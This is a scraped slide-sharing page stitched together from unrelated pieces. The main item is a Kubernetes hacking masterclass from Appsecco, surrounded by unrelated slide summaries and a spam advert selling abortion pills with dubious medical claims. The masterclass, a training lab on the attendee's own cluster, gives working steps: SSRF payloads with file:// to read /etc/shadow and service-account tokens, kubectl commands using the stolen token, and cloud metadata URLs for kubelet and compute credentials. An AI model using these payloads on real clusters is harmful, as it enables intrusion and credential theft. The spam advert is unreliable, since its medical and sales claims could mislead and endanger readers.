Appsecco Kubernetes Hacking Masterclass. The slides used during the class with links to the commands, scripts and setup information.
These slides are to be used with the masterclass video recording on YouTube -
Hands on exercises are highly recommended to get the most out of this class!
The Presentation is about the Basic Introduction to Cybersecurity that talks about introduction and what is security means. Also the presentation talks about CIA Triad i.e confidentiality, integrity and availability
Taxonomy basit anlamda sınıflandırma olsa da gelişkin SIEM çözümlerinde korelasyon motorunun bir parçası ve ilk adımıdır. SIEM çözümleri Taxonomy yi “Logları sınıflandırmak için kullanılan bir yöntemdir” şeklinde tanımlarken gelişmiş SIEM çözümleri ile diğerlerini sınıflandırmanın derinliği ayırt eder. Gelişmiş bir SIEM çözümünde Taxonomy modülü binlerce sınıflandırma yapabilir.
The document discusses machine learning and artificial intelligence applications in cybersecurity, noting that the global artificial intelligence market in cybersecurity is expected to reach $57.1 billion by 2028, and various news articles discuss how machine learning and artificial intelligence can help detect cyberattacks and enhance cybersecurity defenses against evolving threats.
Internet technology and software are inherently vulnerable due to flaws, weaknesses, and gaps in their design, implementation, and security protocols. Thousands of vulnerabilities exist in both software and hardware that can be exploited by hackers if not properly addressed. Common sources of vulnerabilities include design flaws, poor security management, incorrect implementation, vulnerabilities in operating systems, applications, protocols, and ports. Ensuring systems are properly configured, passwords are strong, and users are educated can help reduce vulnerabilities, but due to the complexity of software it is impossible to have fully secure systems.
F. Questier, Computer security, workshop for Lib@web international training program 'Management of Electronic Information and Digital Libraries', university of Antwerp, October 2015
Information security involves protecting information and systems from unauthorized access, use, disclosure, disruption, modification, or destruction. It includes measures to ensure information availability, accuracy, authenticity, confidentiality and integrity. Network security aims to secure network components, connections and contents through authentication, encryption, firewalls and vulnerability patching in a continuous process of securing, monitoring, testing and improving security. Key related terms include assets, threats, vulnerabilities, risks, attacks, and countermeasures.
The document defines security attacks and threats. It describes different types of attacks like passive attacks, active attacks, insider attacks, phishing attacks, spoofing attacks, hijack attacks, exploit attacks and password attacks. It also discusses two common threats - Cross Site Scripting (XSS) and SQL injection. XSS involves injecting malicious code snippets while SQL injection embeds malicious code in a poorly-designed app passed to the backend database.
Bilgi Güvenliği Akademisi tarafından hazırlanan, hedef sistem belli zaafiyetler ile ele geçirildikten sonra sistemdeki Kullanıcıların parolarını nasıl kırılacağı anlatılmıştır.
Detecting and Blocking Suspicious Internal Network Traffic LogRhythm
Internal network traffic in an organization can be as nefarious as an outside hacker trying to gain access to sensitive information. Every organization needs visibility into their network, both internal and external, in order to detect and respond to threats.
Recently, we had an organization that needed a way to detect and block suspicious internal network traffic using SmartResponse from LogRhythm to block shady activity.
View the presentation to see how SmartResponse was enabled to quickly detect suspicious internal network activity against a Web server.
This document discusses footprinting, which is the first step in hacking where a hacker gathers information about a target system. It describes footprinting as both active (direct interaction with the target) and passive (collecting publicly available information). Some methods covered include using the Wayback Machine to view past versions of websites, performing WhoIs lookups to find domain ownership data, using Nmap to discover active machines and open ports, and using social engineering to trick people into revealing confidential information. The goal of footprinting is to learn as much as possible about a target to determine suitable attacks.
Log Korelasyon/SIEM Kural Örnekleri ve Korelasyon Motoru Performans VerileriErtugrul Akbas
Korelasyon yeteneği bir SIEM ürününün en önemli özelliklerinden biridir. Ürünlerin korelasyon yetenekleri farklılık göstermektedir.
Bu çalışmada ortalama bir korelasyon yeteneğine sahip bir SIEM ürünü ile geliştirilebilecek kurallara örnekleri listelemeye çalıştık.
12 Ways Not to get 'Hacked' your Kubernetes ClusterSuman Chakraborty
Kubernetes enable enterprises to automate many aspects of application deployment, providing tremendous business benefits. This talk aims to discuss best practices around Kubernetes security and how threats and exploits can be mitigated, minimizing service disruption on Kubernetes platform.
MuleSoft Meetup Roma - Runtime Fabric Series (From Zero to Hero) - Sessione 2Alfonso Martino
Questa presentazione tratta le seguenti tematiche:
- Service discovery su Kubernetes (Service, Ingress Controller)
- Ingress Controller setup su EKS
- Ingress Controller Template setup su RTF
- Strategie di segregazione del traffico (interno ed esterno)
- Differenze tra RTF BYOK (Bring Your Own Kubernetes) e Self-managed
Top 3 reasons why you should run your Enterprise workloads on GKESreenivas Makam
This deck covers top 3 reasons why Google Kubernetes engine is best suited to run containerized workloads. The reasons covered are Security, Observability and Maturity.
This document provides an overview of Kubernetes and attacking Kubernetes clusters for penetration testers. It begins with introductions to containers, Kubernetes, and setting up a local Kubernetes cluster. It then covers a threat model for Kubernetes and describes an attacker's workflow against a cluster, including discovery, vulnerability testing, exploitation, and persistence. Specific attacks demonstrated include API server authorization testing, discovering exposed etcd and internal services, container escapes, and Helm Tiller privilege escalation. Resources for further learning are also provided.
DevOpsDaysRiga 2018: Andrew Martin - Continuous Kubernetes Security DevOpsDays Riga
Now that we have passed “peak orchestrator” and as Kubernetes eats the world, we are left wondering: how secure is Kubernetes? Can we really run Google-style multi tenanted infrastructure safely? And how can we be sure what we configured yesterday will be in place tomorrow? In this talk we discuss: - the Kubernetes security landscape - risks, security models, and configuration best-practices - how to configure users and applications with least-privilege - how to isolate and segregate workloads and networks - hard and soft multi-tenancy - Continuous Security approaches to Kubernetes.
Attendees will learn how to leverage the identity and authorisation, network security and secrets management features of the wider AWS platform for their containers, including Amazon Elastic Container Service (Amazon ECS) and Amazon Elastic Container Service for Kubernetes (Amazon EKS). We also discuss best practices for the security of your container images such as scanning them for known vulnerabilities.
Do any VM's contain a particular indicator of compromise? E.g. Run a YARA signature over all executables on my virtual machines and tell me which ones match.
MuleSoft Surat Meetup#42 - Runtime Fabric Manager on Self Managed Kubernetes ...Jitendra Bafna
Runtime Fabric Manager on Self Managed Kubernetes differs from Runtime Fabric Manager on bare metals/VMs in several ways:
On Self Managed Kubernetes, the Kubernetes control plane is managed by the cloud provider, whereas on bare metals/VMs the user manages the control plane. Self Managed Kubernetes provides benefits like auto-scaling and monitoring that are handled by the cloud provider. The user also has flexibility to choose their own ingress load balancer and operating system when using Self Managed Kubernetes. However, there are some limitations when using Self Managed Kubernetes, such as a lower maximum number of nodes and replicas per application.
Kubernetes Architecture with ComponentsAjeet Singh
This document provides an overview of Kubernetes architecture and components. It describes how to run a simple Kubernetes setup using a Docker container. The container launches all key Kubernetes components including the API server, scheduler, etcd and controller manager. Using kubectl, the document demonstrates deploying an nginx pod and exposing it as a service. This allows curling the nginx default page via the service IP to confirm the basic setup is functioning.
A basic introduction to Kubernetes. Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.
Deploy the blockchain network using kubernetes ap is on google cloudAjeet Singh
This document provides instructions for deploying a Hyperledger Fabric 1.2 blockchain network with Hyperledger Composer 0.20 using Kubernetes APIs on Google Cloud Platform. It describes using Kubernetes concepts like pods, jobs, deployments and services to run the blockchain network. Steps include modifying configuration files, running a script to deploy the network onto the Kubernetes cluster, testing transactions, and viewing the deployed network on the Kubernetes dashboard.
Consolidating Infrastructure with Azure Kubernetes Service - MS Online Tech F...Davide Benvegnù
[SLIDES FROM MICROSOFT ONLINE TECH FORUM SESSION]
Kubernetes is the open source container orchestration system that supercharges applications with scaling and reliability and unlocks advanced features, like A/B testing, Blue/Green deployments, canary builds, and dead-simple rollbacks.
In this session, see how Tailwind Traders took a containerized application and deployed it to Azure Kubernetes Service (AKS).
You’ll walk away with a deep understanding of major Kubernetes concepts and how to put it all to use with industry standard tooling.
Sydney based cloud consultancy Cloudten's Richard Tomkinson shows how masterless Puppet can be used in concert with AWS's services including Lambda to automate server builds and manage code deployments
Similar to Appsecco Kubernetes Hacking Masterclass Presentation Slides (20)
Fragments-Plug the vulnerabilities in your AppAppsecco
The document provides an overview of a discussion on mobile application security testing between Riddhi Shree and Riyaz Walikar of Appsecco. They discuss common weaknesses found during mobile app testing like trusting third parties, ignoring API authentication and authorization, and not implementing proper input validation. They also cover steps developers should take like verifying third party code, implementing layered defenses, and following secure development best practices around authentication, authorization, and least privilege. The discussion includes a bonus section on setting up a mobile security testing lab.
These are some of Appsecco's case studies from 2019 that showcase the breadth of work we undertake, the wide range of clients we work with on a daily basis and the results we achieve with them.
They range from working with a multi-billion dollar company to secure their AWS infrastructure, to helping a leading player in the airline loyalty sector improve the security of their flagship product, to ensuring a Caribbean bank's security was strong enough to get them un-blacklisted by major end-point security programs.
Don't hesitate to contact us if you would like to discuss how any of the work we've delivered can help you on your security journey or to learn more about how Appsecco can help you in your cloud and application security goals in general.
Appsecco is a specialist application and cloud security company with physical presence in London, Bangalore and Boston, providing industry leading advice that is firmly grounded in commercial reality.
These are some of Appsecco's case studies from 2018 to showcase the breadth of work we typically undertake and the results we achieve for our clients.
They range from helping a leading investment bank up-skill their security team to working with an international ed-tech company redesign they way the develop software to the complete penetration test of a ship!
Don't hesitate to contact us if you would like to discuss any of them in more detail or to learn more about how Appsecco can help you on your security journey.
Appsecco is a specialist application and cloud security company with physical presence in London, Bangalore and Boston, providing industry leading advice that is firmly grounded in commercial reality.
These are some of Appsecco's case studies from 2017 to demonstrate the breadth of work we typically undertake and the results we achieve.
They range from helping organisations to recover from attacks to penetration testing and application vulnerability assessments to changing the way clients look at their security posture overall and in industries ranging from financial services to manufacturing and software development to luxury goods.
Don't hesitate to contact us if you would like to discuss any of them in more detail or to learn more about how Appsecco can help you on your security journey.
Appsecco is a specialist application and cloud security company with physical presence in London, Bangalore and Boston, providing industry leading advice that is firmly grounded in commercial reality.
Appsecco’s sanity check security baseline cyber audit is a high-level review of your overall online presence that highlights everything a would-be attacked can see about you, not just what you believe you have online.
All the information we gather is done so using the same techniques that attackers preparing an attack use.
It is carried out completely remotely and without any risk to, or trace on, your IT systems or web presence.
This means that there is no need for any internal resources to be involved or for you to answer technical questions, we only need something as simple as a domain name to begin.
Security Baseline cyber audits help create an understandable baseline for you to be able to make informed decisions about your organisation’s security going forward and highlight any immediate issues that need your attention.
Don't hesitate to contact us if you would like to discuss what we do in more detail or to learn more about how Appsecco can help you on your security journey.
Appsecco is a specialist application security company with physical presence in London, Bangalore, Doha and Boston, providing industry leading security advice that is firmly grounded in commercial reality.
Appsecco can help you ensure that you get the greatest value for your cyber security budget by helping to match your operational and commercial needs with the most appropriate products and services currently available in the market.
Our services include:
Pre-procurement audits - to ensure that you have a complete understanding of what needs to be secured and all areas of risk before you start speaking to suppliers
Proposal and contract insight- where we offer pragmatic, commercial insight and opinion, in non-technical language, into the solutions that suppliers are proposing and how these map to the outcomes you want to achieve
Report reviews - that help you understand what the reports your suppliers mean in commercial and operational terms and what you need to do next to make the most of them.
Don't hesitate to contact us if you would like to discuss what we do in more detail or to learn more about how Appsecco can help you on your security journey.
Appsecco is a specialist application security company with physical presence in London, Bangalore, Doha and Boston, providing industry leading security advice that is firmly grounded in commercial reality.
Appsecco has been working with Private Equity funds since our inception and so have a real understanding of what’s important to you and the specific challenges you face.
We work closely with you at all stages of your investment cycle to ensure that you get quick, timely and relevant information to truly add value to your decision-making process.
From providing quick, actionable insight during the diligence process, to carrying out portfolio reviews and monitoring to ensure the value of your investments are protected and your ESG obligations met, to pre-exit reviews that form part of a diligence pack (or to ensure you have no sudden surprises) we’re here to support you.
Don't hesitate to contact us if you would like to discuss what we do in more detail or to learn more about how Appsecco can help you on your security journey.
Appsecco is a specialist application security company with physical presence in London, Bangalore, Doha and Boston, providing industry leading security advice that is firmly grounded in commercial reality.
COMPSAC 2024 D&I Panel: Charting a Course for Equity: Strategies for Overcomi...Hironori Washizaki
Hironori Washizaki, "Charting a Course for Equity: Strategies for Overcoming Challenges and Promoting Inclusion in the Metaverse", IEEE COMPSAC 2024 D&I Panel, 2024.
In this talk, we will explore strategies to optimize the success rate of storing and retaining new information. We will discuss scientifically proven ideal learning intervals and content structures. Additionally, we will examine how to create an environment that improves our focus while you remain in the “flow”. Lastly we will also address the influence of AI on learning capabilities.
In the dynamic field of software development, this knowledge will empower you to accelerate your learning curve and support others in their learning journeys.
What is OCR Technology and How to Extract Text from Any Image for FreeTwisterTools
Discover the fascinating world of Optical Character Recognition (OCR) technology with our comprehensive presentation. Learn how OCR converts various types of documents, such as scanned paper documents, PDFs, or images captured by a digital camera, into editable and searchable data. Dive into the history, modern applications, and future trends of OCR technology. Get step-by-step instructions on how to extract text from any image online for free using a simple tool, along with best practices for OCR image preparation. Ideal for professionals, students, and tech enthusiasts looking to harness the power of OCR.
React and Next.js are complementary tools in web development. React, a JavaScript library, specializes in building user interfaces with its component-based architecture and efficient state management. Next.js extends React by providing server-side rendering, routing, and other utilities, making it ideal for building SEO-friendly, high-performance web applications.
React Native vs Flutter - SSTech SystemSSTech System
Your project needs and long-term objectives will ultimately choose which of React Native and Flutter to use. For applications using JavaScript and current web technologies in particular, React Native is a mature and trustworthy choice. For projects that value performance and customizability across many platforms, Flutter, on the other hand, provides outstanding performance and a unified UI development experience.
WhatsApp Tracker - Tracking WhatsApp to Boost Online Safety.pdfonemonitarsoftware
WhatsApp Tracker Software is an effective tool for remotely tracking the target’s WhatsApp activities. It allows users to monitor their loved one’s online behavior to ensure appropriate interactions for responsive device use.
Download this PPTX file and share this information to others.
IN Dubai [WHATSAPP:Only (+971588192166**)] Abortion Pills For Sale In Dubai** UAE** Mifepristone and Misoprostol Tablets Available In Dubai** UAE
CONTACT DR. SINDY Whatsapp +971588192166* We Have Abortion Pills / Cytotec Tablets /Mifegest Kit Available in Dubai** Sharjah** Abudhabi** Ajman** Alain** Fujairah** Ras Al Khaimah** Umm Al Quwain** UAE** Buy cytotec in Dubai +971588192166* '''Abortion Pills near me DUBAI | ABU DHABI|UAE. Price of Misoprostol** Cytotec” +971588192166* ' Dr.SINDY ''BUY ABORTION PILLS MIFEGEST KIT** MISOPROSTOL** CYTOTEC PILLS IN DUBAI** ABU DHABI**UAE'' Contact me now via What's App… abortion pills in dubai Mtp-Kit Prices
abortion pills available in dubai/abortion pills for sale in dubai/abortion pills in uae/cytotec dubai/abortion pills in abu dhabi/abortion pills available in abu dhabi/abortion tablets in uae
… abortion Pills Cytotec also available Oman Qatar Doha Saudi Arabia Bahrain Above all** Cytotec Abortion Pills are Available In Dubai / UAE** you will be very happy to do abortion in Dubai we are providing cytotec 200mg abortion pills in Dubai** UAE. Medication abortion offers an alternative to Surgical Abortion for women in the early weeks of pregnancy. We only offer abortion pills from 1 week-6 Months. We then advise you to use surgery if it's beyond 6 months. Our Abu Dhabi** Ajman** Al Ain** Dubai** Fujairah** Ras Al Khaimah (RAK)** Sharjah** Umm Al Quwain (UAQ) United Arab Emirates Abortion Clinic provides the safest and most advanced techniques for providing non-surgical** medical and surgical abortion methods for early through late second trimester** including the Abortion By Pill Procedure (RU 486** Mifeprex** Mifepristone** early options French Abortion Pill)** Tamoxifen** Methotrexate and Cytotec (Misoprostol). The Abu Dhabi** United Arab Emirates Abortion Clinic performs Same Day Abortion Procedure using medications that are taken on the first day of the office visit and will cause the abortion to occur generally within 4 to 6 hours (as early as 30 minutes) for patients who are 3 to 12 weeks pregnant. When Mifepristone and Misoprostol are used** 50% of patients complete in 4 to 6 hours; 75% to 80% in 12 hours; and 90% in 24 hours. We use a regimen that allows for completion without the need for surgery 99% of the time. All advanced second trimester and late term pregnancies at our Tampa clinic (17 to 24 weeks or greater) can be completed within 24 hours or less 99% of the time without the need for surgery. The procedure is completed with minimal to no complications. Our Women's Health Center located in Abu Dhabi** United Arab Emirates** uses the latest medications for medical abortions (RU-486** Mifeprex** Mifegyne** Mifepristone** early options French abortion pill)** Methotrexate and Cytotec (Misoprostol). The safety standards of our Abu Dhabi** United Arab Emirates Abortion Doctors remain unparalleled. They consistently maintain the lowest complication rates throughout the nation. Our
Overview of ERP - Mechlin Technologies.pptxMitchell Marsh
This PowerPoint presentation provides a comprehensive overview of Enterprise Resource Planning (ERP) systems. It covers the fundamental concepts, benefits, and key functionalities of ERP software, illustrating how it integrates various business processes into a unified system. From finance and HR to supply chain and customer relationship management, ERP facilitates efficient data management and decision-making across organizations. Whether you're new to ERP or looking to deepen your understanding, this presentation offers valuable insights into leveraging ERP for business success.
Cultural Shifts: Embracing DevOps for Organizational TransformationMindfire Solution
Mindfire Solutions specializes in DevOps services, facilitating digital transformation through streamlined software development and operational efficiency. Their expertise enhances collaboration, accelerates delivery cycles, and ensures scalability using cloud-native technologies. Mindfire Solutions empowers businesses to innovate rapidly and maintain competitive advantage in dynamic market landscapes.
An MVP (Minimum Viable Product) mobile application is a streamlined version of a mobile app that includes only the core features necessary to address the primary needs of its users. The purpose of an MVP is to validate the app concept with minimal resources, gather user feedback, and identify any areas for improvement before investing in a full-scale development. This approach allows businesses to quickly launch their app, test its market viability, and make data-driven decisions for future enhancements, ensuring a higher likelihood of success and user satisfaction.
Are you wondering how to migrate to the Cloud? At the ITB session, we addressed the challenge of managing multiple ColdFusion licenses and AWS EC2 instances. Discover how you can consolidate with just one EC2 instance capable of running over 50 apps using CommandBox ColdFusion. This solution supports both ColdFusion flavors and includes cb-websites, a GoLang binary for managing CommandBox websites.
Lots of bloggers are using Google AdSense now. It’s getting really popular. With AdSense, bloggers can make money by showing ads on their websites. Read this important article written by the experienced designers of the best website designing company in Delhi –
2. What will
we do
today?
1. Deploy a GKE cluster in our own accounts
and setup some misconfigurations to exploit
2. Talk about some relevant Kubernetes controls
for today's masterclass
3. Attack our own setup to exploit RBAC and pod
level access to compromise the cluster
4. Q&A
o use the Q&A and chat feature, send your
questions etc. I will comment/answer as and
when I see them.
4. Download the following file and open it in a text editor.
DO NOT RUN ANY COMMANDS YET!
https://appsecco-masterclass.s3.amazonaws.com/commands.txt
Login to Google Cloud Console and in the same browser open a
Google CloudShell in a new tab. Make sure your project is selected
for CloudShell.
https://console.cloud.google.com/
https://shell.cloud.google.com/?show=terminal
5. Make sure you run the commands from the Google CloudShell
1. Run the commands from commands.txt to create your cluster. Read the
comments to understand what the commands are doing.
2. Note the IP address printed at the end of the command
7. Kubernetes, and depending on the cloud platform it is run on top of, has
multiple security features and controls built into the environment.
• As hackers we rely on these to be misconfigured or absent :)
We will look at 2 main security/concepts in Kubernetes, relevant to our class
today
1. Pod Security Admission
2. Role Based Access Control
8. 1. Let's create 2 namespaces each with a different Pod Security Standard
2. Go to the `~/masterclass/pod-admission-controller-lab` folder
and run these commands to create new namespaces
o kubectl apply -f restricted-namespace.yaml
o kubectl apply -f privileged-namespace.yaml
3. Now attempt to start a privileged pod within each of the namespaces
o kubectl get ns
o kubectl apply -f nginx-privileged.yaml -n privileged-namespace
o kubectl apply -f nginx-privileged.yaml -n restricted-namespace
4. What do you see?
9. Pod Admission Controller – In simple terms
• This is code that intercepts requests reaching the API server to verify if
the object (pod, namespace etc.) create request passes a list of allowed
checks or not.
o The list of checks the request is compared against are called the Pod
Security Standards
o There are 3 standards - privileged, baseline, and restricted
10. Let's enumerate what roles and clusterroles are present in this cluster
and how they are bound
1. Enumerate roles within the kube-system namespace
o kubectl get roles -n kube-system
o kubectl get rolebindings -n kube-system
2. For each of the rolebindings enumerate the subject attached
o kubectl get rolebindings <BINDING_NAME> -n kube-system
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud-
provider --list
11. Let's repeat the same but with clusterroles and clusterrolebindings to
see cluster wide RBAC
1. Enumerate clusterroles across the cluster
o kubectl get clusterroles
o kubectl get clusterrolebindings
2. For the clusterrolebindings that use a privileged clusterrole, enumerate
the subject attached
o kubectl get clusterrolebindings <BINDING_NAME>
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:apps:default --list
12. Role and ClusterRole and Bindings
• An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions
are purely additive (there are no "deny" rules).
• A Role always sets permissions within a particular namespace;when you create a Role,you
have to specifythe namespace it belongs in.
• ClusterRole,is a non-namespaced resourceand applies to the entire cluster.
• Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service
accounts) with a roleRef pointing to the role which gives the subject the specific permissions
• If you want to define a role within a namespace,use a Role;if you want to define a role cluster-
wide, use a ClusterRole.
15. • All pods will have access to the default service account mounted as a file
system object within the pod at
o /var/run/secrets/kubernetes.io/serviceaccount/token
o /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
• We can extract them and use them to interact with the cluster
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
So how do we gain access to this service account or files from the pod?
16. • Let's take a closer look at the app that was deployed
• Login to the application using username serveradmin and password
monitorworld
• What is the app's functionality?
• What vulnerability is present here?
17. • The application takes a URL from the user and makes a server side
request on the user's behalf
o Such a feature, if not protected properly is often vulnerable to Server Side
Request Forgeries (SSRF/XSPA)
• Depending on the request library used in the server side code, file:// is
also a valid request protocol and can be used to read local files!
• Try these as input
o file:///etc/passwd
o file:///etc/shadow
18. • Let's read the token and ca.crt so that we can interact with the cluster
using stolen credentials! Save these inside your Google CloudShell.
file:///var/run/secrets/kubernetes.io/serviceaccount/token
file:///var/run/secrets/kubernetes.io/serviceaccount/ca.crt
• Run kubectl with the token and ca.crt to gain access to the cluster using
the stolen secret of the service account
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
• Use auth plugin to view your current access with the stolen credentials
kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt -
-list
21. We can go a little further with our setup in this class. We have an app with SSRF
running inside a GKE cluster. You can perform the following additional actions
1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE
information etc.
• file:///proc/self/environ
2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials
• http://169.254.169.254/computeMetadata/v1/instance/attributes/kube-env
3. Fetch the Google VM instance's compute service account's token and scope to query the
underlying cloud platform itself! This is escaping from the cluster to the cloud environment.
• http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token
• http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/scopes
• http://169.254.169.254/computeMetadata/v1/project/project-id
28. • Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration
Testing as a Service at Appsecco
• Appsecco is a boutique security consulting company with
customers across the world.
• Over a decade and half experience with hacking web apps,
APIs, mobile, wireless, networks and more lately cloud and
containers
• Love to teach! Speak and train at a bunch of conferences!
https://www.linkedin.com/in/riyazw/
riyaz@appsecco.com | +91 9886042242
https://appsecco.com | https://blog.appsecco.com
29. About Appsecco
Pragmatic, holistic, business-focused approach
Specialist Cloud and Application Security company
Highly experienced and diverse team
Assigned multiple CVEs
Certified hackers
OWASP chapter leads
Cloud and Kubernetes security experts
Black Hat & Def Con speakers